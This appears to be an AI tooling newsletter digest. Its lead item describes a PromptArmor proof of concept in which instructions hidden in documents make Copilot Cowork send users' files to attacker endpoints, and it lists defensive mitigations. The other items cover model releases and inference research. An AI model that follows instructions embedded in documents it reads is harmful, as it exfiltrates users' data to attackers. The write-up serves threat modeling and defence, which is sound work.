Prompt injection exfiltrates files from Copilot Cowork — every RAG tool with file access shares this attack surface.
Top Signal
Copilot Cowork exfiltrates files via prompt injection — PoC live
platform change
HN Front Page
PromptArmor demonstrated a working exploit against Microsoft Copilot Cowork: malicious content embedded in documents instructs Copilot to exfiltrate file contents to attacker-controlled endpoints. The chain is pure indirect prompt injection — user opens a weaponized doc, Copilot processes it, embedded instructions override system behavior, files leave silently. No additional user interaction required. The attack surface is any AI assistant with (1) file access, (2) external content ingestion, and (3) outbound request capability — which describes most enterprise RAG deployments. Actionable now: audit every AI feature you've shipped for this triad. Mitigations include restricting outbound URLs the model can invoke, treating all ingested content as untrusted input regardless of source, and validating outputs before any action is executed. Use the PromptArmor writeup as a threat-modeling template — this attack pattern generalizes beyond Copilot to any document-aware AI.
Read more →
Fast Signals
NuExtract3: self-hostable 4B VLM for structured doc extraction
new tool
r/LocalLLaMA
NuMind released NuExtract3, an open-weight 4B vision-language model purpose-built for structured JSON extraction from PDFs, images, Markdown, and OCR'd documents. Self-hostable alternative to GPT-4V for document parsing pipelines — drop it in where you're paying API costs for invoice, form, or report extraction workflows.
Link →
Full attention → sparse in 100 steps: cheap long-context adaptation
research to practice
r/LocalLLaMA
New paper shows pre-trained full-attention models can be converted to sparse attention in under 100 training steps with minimal accuracy loss — no full re-pretraining required. Practical implication: adapt existing base models for efficient long-context inference at a fraction of the usual compute. Watch for llama.cpp and vLLM integrations as this matures.
Link →
earendil-works/pi: coding agent CLI + unified LLM API in one toolkit
new tool
GitHub Trending
pi is a trending GitHub toolkit bundling a coding agent CLI, unified multi-provider LLM API, TUI and web UI libraries, a Slack bot, and vLLM pod support. If you're assembling agent infrastructure from scratch, benchmark this as a framework baseline before building from parts.
Link →
OSCAR RotationZoo: 2-bit KV cache quant without accuracy collapse
research to practice
r/LocalLLaMA
OSCAR applies offline spectral covariance-aware rotations to enable 2-bit KV cache quantization — more aggressive than standard Q4/Q5 KV approaches. If you're serving long-context models at scale where KV cache memory is your bottleneck, this is the current research frontier to track before productionization.
Link →
llama.cpp split mode tensor crash fix imminent — 35% TG speedup unlocked
platform change
r/LocalLLaMA
Split mode tensor delivers ~35% throughput gain over layer split for multi-GPU setups but currently crashes every 90-120 min due to VRAM exhaustion. A fix PR appears imminent. Multi-GPU llama.cpp operators: watch the PR tracker and prep to enable split mode the moment it lands.
Link →
ThriftAttention: selective FP4 precision for long-context attention
research to practice
r/LocalLLaMA
ThriftAttention selectively applies FP4 precision only to attention heads where low precision costs least accuracy in long-context inference. Paired with OSCAR above, this represents an emerging two-part toolkit for extreme KV compression — read both papers together for a complete long-context optimization picture.
Link →
Radar
cmux: macOS terminal built for AI coding agents
Ghostty-based macOS terminal with vertical tabs and per-agent notifications — purpose-built for running multiple AI coding agents in parallel. Early project, but signals a UX category forming around terminals that treat agents as first-class session types.
Link →
MiMo-V2.5-coder: Xiaomi iterates on local coding model
MiMo-V2.5-coder appeared on r/LocalLLaMA; MiMo V2 showed competitive coding results and Xiaomi has iterated quickly. No benchmarks in initial post — worth watching for community evals this week.
Link →
anthropics/knowledge-work-plugins: official Claude Cowork plugin repo
Anthropic published an open-source repo of knowledge-worker plugins for Claude Cowork — and a file-exfiltration vuln dropped the same day. If you're building on Cowork's plugin API, study this repo to understand the intended security model before deploying.
Link →
Convergence Watch
qwen3.6
TRENDING
5 mentions across r/LocalLLaMA, r/LocalLLaMA, r/LocalLLaMA, r/LocalLLaMA, r/LocalLLaMA
Qwen3.6 35B A3B has dominated r/LocalLLaMA for 5+ consecutive days with steadily rising source counts (4→5→7 over the past three days, plus 5 today). Community consensus is solidifying: it's the current best local model for agentic tasks. A V100 cluster is already achieving 1000+ TPS on Qwen3.6 27B. If you haven't evaluated it as your default local agent backbone, this is the week to do it.
STALE: Latent Space newest item is >48h old